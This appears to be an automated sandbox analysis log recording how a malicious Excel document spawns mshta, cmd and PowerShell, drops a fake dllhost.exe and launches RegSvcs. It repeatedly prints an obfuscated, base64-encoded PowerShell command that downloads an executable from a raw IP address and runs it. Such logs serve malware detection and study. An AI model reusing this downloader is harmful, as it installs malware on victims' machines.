
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp" "c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Users\user\AppData\Roaming\dllhost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp" "c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Source: C:\Users\user\AppData\Roaming\dllhost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp" "c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP" Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp" "c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP"
Source: C:\Users\user\AppData\Roaming\dllhost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwmapi.dll Jump to behavior
